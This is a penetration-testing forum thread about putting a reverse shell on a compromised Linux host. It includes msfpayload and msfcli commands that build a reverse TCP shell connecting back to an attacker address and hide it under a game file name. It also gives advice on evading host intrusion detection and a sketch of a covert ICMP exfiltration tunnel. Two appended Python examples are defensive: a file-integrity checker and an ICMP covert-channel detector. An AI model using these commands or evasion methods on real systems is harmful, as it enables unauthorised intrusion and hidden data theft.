How to use the Meterpreter once I have SSH working?

caissyd

Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Tue Jun 29, 2010 8:33 pm

How to use the Meterpreter once I have SSH working?

Hi,

On a machine, I now have a working SSH connection using, let's say, username: "bob" and password: "secret".

Now how can I upload a "Meterpreter client" or something like that to this machine so I can use it to do more stuff?

As a note, once logged in to the target machine (using ssh, obviously), I can FTP back to my attacking machine, so copying the file is not the problem. What I need to know is which file to copy and how to use it!!!

Thanks
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Tue Jun 29, 2010 9:04 pm

Re: How to use the Meterpreter once I have SSH working?

I think it all depends - is it a Linux or Windows box that you have ssh access to? I've never seen a meterpreter payload available for Linux OSes.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP

hayabusa

Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Tue Jun 29, 2010 10:51 pm

Re: How to use the Meterpreter once I have SSH working?

You're wanting something like a reverse meterpreter shell, I assume? 

http://www.metasploit.com/modules/paylo ... everse_tcp

HTH.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Wed Jun 30, 2010 12:34 am

Re: How to use the Meterpreter once I have SSH working?

Ha, that's awesome. I went throughout the whole PWB course without knowing about this payload. Would've come in handy in multiple situations.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP

caissyd

Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Wed Jun 30, 2010 5:01 am

Re: How to use the Meterpreter once I have SSH working?

@xXxKrisxXx: I am hacking a linux machine.

@hayabusa: Thanks, but once I have called the "generate" command, what's next? Does it create a file or something? I can't seem to find it... :-\
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Wed Jun 30, 2010 12:14 pm

Re: How to use the Meterpreter once I have SSH working?

eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP

caissyd

Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Wed Jun 30, 2010 12:30 pm

Re: How to use the Meterpreter once I have SSH working?

These examples are probably what I was looking for:

  Code:
./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores


  Code:
./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 E


I will give it a try tonight, thanks xXxKrisxXx
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)

sil

Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Wed Jun 30, 2010 2:46 pm

Re: How to use the Meterpreter once I have SSH working?

Also remember, netcat is your friend at the end of the day:

http://www.scribd.com/Penetration-Testi ... /d/3064507

A thing to keep in mind is HIDS. I try to act as if HIDS are always going to be installed on a machine. This means any introduction of new code, applications, or filename and timestamp changes can trigger bells and whistles. If you keep this in mind, it will allow you to take a step away from being too reliant on, say, metasploit or any other tool. E.g., you got your access; however, you need more X... *nix provides a variety of tools already on the system that will allow you to do whatever you want to do. (nc, forward may be installed on some systems http://linux.die.net/man/1/forward, socat)

I've been tinkering with something on the Windows side of pentesting for situations like this... I call it TaiChiRedTeaming for lack of a cooler name. The goal is to use the system against itself. This morning I started tinkering with wmic and came up with Amphibios...

  Code:
rem   The purpose of Amphibios is to accumulate detailed information
rem   on the system in which launches Amphibios without introducing
rem   or installing applications on the system itself. The use of
rem   Amphibios can be correlated with either a system administrator
rem   documenting and detailing information on the system, or one can
rem   use the information for other means. For example, in performing
rem   a host based penetration test, the information gathered via say
rem   installed patches will allow a tester to determine the possible
rem   exposure state due to patches that weren't installed.

rem   Amphibios gathers information on all applications, patches,
rem   users, groups and diskspace on a machine. By putting this info
rem   all into one repository, the data can be used for quite a few
rem   purposes. While Amphibios is my first Windows based script (I
rem   come from a *nix background), I may or may not alter it to
rem   have the capabilities of sending data to a DB however, at this
rem   point in time, Amphibios is nothing more than a test slash
rem   work in progress. I may make it post to a remote db then have
rem   that system parse out which updates are installed, check for
rem   missing patches, updates, vulnerable software, then create
rem   a structured and tactical penetration test against the output.

rem   ************************    NOTE    ************************

rem   Right now, I'm just familiarizing myself with wmic and
rem   powershell so - yes I do know this is butt ugly

rem   ************************    NOTE    ************************


So far it's butt ugly but I've got it to do what I've set out to do so far.

http://www.infiltrated.net/amphibiosxp.txt
http://www.infiltrated.net/amphibiosxp.bat (same file as above just renamed)

It's something I can literally copy and paste once I'm on a machine. I plan on eventually making it an xml file and parsing data from what it obtains into populating an attack plan on a machine. Think: "pseudo-heuristi-yet-focused pre-pentest tool". The beauty of it is, I install zero to get me enough information to see what I can use on the system to escalate, maintain status, subvert, etc.

Wish I had more time though, I plan on rewriting it from scratch. It's conceptual but a horribly good concept/idea. If I can get it working the way I want, I can probably automate more effective pentests with better results. Or... I can probably just learn powershell and win commands and accomplish nothing. In either event... Think outside the box


#########################################################

ADDED 3:57PMEST


Forgot to add Paketto (http://freshmeat.net/projects/paketto/). Has some interesting tools and there was an interesting document I read years back, can't remember who wrote it or what the name was. Went something like this (in terms of covertness)...

So you compromise a machine and need data OFF or ON. You choose an ICMP covert shell with the destination address going to ... WHO CARES, ANYONE. Your goal is to sniff the ICMP traffic and recompile the data you need. There is minimal pointing back to you.

You --> compromise machine
You --> create a covert ICMP tunnel somewhere along a line of sight between you and compromised host
You --> sanitize compromise
You --> blindly spoof data TO machine from another machine along the line of sight (remember, blind spoofing you don't care about the results)
Machine --> responds via ICMP messages to ... WHO CARES ... All you care about is seeing (sniffing) the data

Within the ICMP tunnel you can pretty much do whatever you'd like. Although you are blindly spoofing, you won't get an immediate response from the machine, but via sniffing you would see the results going to someone else. ... Make sense?
Last edited by sil on Wed Jun 30, 2010 3:04 pm, edited 1 time in total.
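Added example, not from any poster in this thread: the kind of check a host-based IDS runs to catch exactly what sil warns about above, a new file, a changed file, a new executable bit or a rolled-back timestamp. The demo baselines a games directory and then flags a new +x file at the same path the earlier msfpayload one-liner writes to; the directory, file names and contents are constructed.

```python
import hashlib
import os
import stat
import tempfile

def snapshot(root):
    """Map each regular file under root to (sha256, mtime, owner-executable?)."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # ignore symlinks, sockets, devices
            with open(path, "rb") as f:
                digest = hashlib.sha256(f.read()).hexdigest()
            rel = os.path.relpath(path, root)
            snap[rel] = (digest, int(st.st_mtime), bool(st.st_mode & stat.S_IXUSR))
    return snap

def diff_snapshots(before, after):
    """Alerts a HIDS would raise: new files, changed content, new +x bit, mtime rolled back."""
    alerts = []
    for rel, (digest, mtime, exe) in after.items():
        if rel not in before:
            alerts.append(("added-executable" if exe else "added", rel))
            continue
        old_digest, old_mtime, old_exe = before[rel]
        if digest != old_digest:
            alerts.append(("modified", rel))
        if exe and not old_exe:
            alerts.append(("chmod+x", rel))
        if mtime < old_mtime:
            alerts.append(("mtime-rolled-back", rel))  # timestomping leaves this trace
    return sorted(alerts)

def demo():
    """Constructed scenario: a baseline of a games directory, then a new +x file appears."""
    root = tempfile.mkdtemp()
    games = os.path.join(root, "usr", "games")
    os.makedirs(games)
    with open(os.path.join(games, "freesweep"), "wb") as f:
        f.write(b"#!/bin/sh\necho game\n")
    os.chmod(os.path.join(games, "freesweep"), 0o755)
    before = snapshot(root)
    dropped = os.path.join(games, "freesweep_scores")  # same path as the thread's msfpayload line
    with open(dropped, "wb") as f:
        f.write(b"\x7fELF constructed placeholder, not a real binary")
    os.chmod(dropped, 0o755)
    return diff_snapshots(before, snapshot(root))
```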
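A second added example, again not from any poster: a detector for the blind-spoofed ICMP channel sil sketches in his "ADDED" section. It flags echo replies that never had a matching request on the wire, and echo payloads that do not look like a stock ping (the iputils and Windows default bodies) while being large or high-entropy. The capture is constructed; the addresses are placeholders.

```python
import math
import struct
from collections import Counter

LINUX_PING_PATTERN = bytes(range(0x10, 0x38))   # iputils ping body after its 8-byte timestamp
WINDOWS_PING_PATTERN = b"abcdefghijklmnopqrstuvwabcdefghi"

def entropy(data):
    """Shannon entropy in bits per byte; compressed or encrypted data approaches 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def parse_icmp(raw):
    """Split a raw ICMP message into (type, code, identifier, sequence, payload)."""
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    return typ, code, ident, seq, raw[8:]

def inspect(packets):
    """packets: (src, dst, raw_icmp) tuples in capture order -> list of (reason, src, dst)."""
    alerts, seen_requests = [], set()
    for src, dst, raw in packets:
        typ, _code, ident, seq, payload = parse_icmp(raw)
        if typ not in (0, 8):
            continue
        if typ == 8:
            seen_requests.add((dst, src, ident, seq))   # the reply we expect to see later
        elif (src, dst, ident, seq) not in seen_requests:
            alerts.append(("reply-without-request", src, dst))
        standard = payload[8:] == LINUX_PING_PATTERN or payload == WINDOWS_PING_PATTERN
        if not standard and (len(payload) > 64 or entropy(payload) > 6.0):
            alerts.append(("suspicious-payload", src, dst))
    return alerts

def build(typ, ident, seq, payload):
    """Constructed sample packet; checksum left zero since nothing transmits it."""
    return struct.pack("!BBHHH", typ, 0, 0, ident, seq) + payload

def demo():
    """Constructed capture: one ordinary ping exchange, then an unsolicited high-entropy reply."""
    ordinary = b"\x00" * 8 + LINUX_PING_PATTERN
    pkts = [
        ("10.0.0.5", "10.0.0.9", build(8, 1, 1, ordinary)),
        ("10.0.0.9", "10.0.0.5", build(0, 1, 1, ordinary)),
        ("10.0.0.9", "203.0.113.7", build(0, 7, 3, bytes(range(256)) * 2)),
    ]
    return inspect(pkts)
```

On a real sensor the same two rules run over decoded ICMP from a pcap, keyed on the identifier and sequence fields so legitimate long-running pings are not flagged.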

Return to Network Pen Testing
